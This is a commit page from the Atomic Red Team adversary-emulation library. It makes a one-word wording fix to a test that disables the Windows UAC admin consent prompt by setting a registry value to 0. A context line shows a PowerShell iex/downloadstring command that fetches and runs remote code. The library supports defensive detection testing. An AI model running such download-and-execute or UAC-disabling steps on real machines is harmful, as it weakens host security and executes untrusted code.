security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2022-10-13 17:48:19 +00:00
parent a7bf035f55
commit 84cd4177fe
2 changed files with 3 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/index.yaml
+2 -2
View File
@@ -2590,7 +2590,7 @@ defense-evasion:
- name: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry
key
auto_generated_guid: 251c5936-569f-42f4-9ac2-87a173b9e9b8
description: "Disable User Account Conrol (UAC) for admin by modifying the registry
description: "Disable User Account Conrol (UAC) for admin by setting the registry
key \nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin
to 0.\n\n[MedusaLocker Ransomware](https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/),
\n[Purple Fox Rootkit](https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit),
@@ -28983,7 +28983,7 @@ privilege-escalation:
- name: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry
key
auto_generated_guid: 251c5936-569f-42f4-9ac2-87a173b9e9b8
description: "Disable User Account Conrol (UAC) for admin by modifying the registry
description: "Disable User Account Conrol (UAC) for admin by setting the registry
key \nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin
to 0.\n\n[MedusaLocker Ransomware](https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/),
\n[Purple Fox Rootkit](https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit),
atomics/T1548.002/T1548.002.md
+1 -1
View File
@@ -1099,7 +1099,7 @@ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/
<br/>
## Atomic Test #22 - Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Disable User Account Conrol (UAC) for admin by modifying the registry key
Disable User Account Conrol (UAC) for admin by setting the registry key
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin to 0.
[MedusaLocker Ransomware](https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/),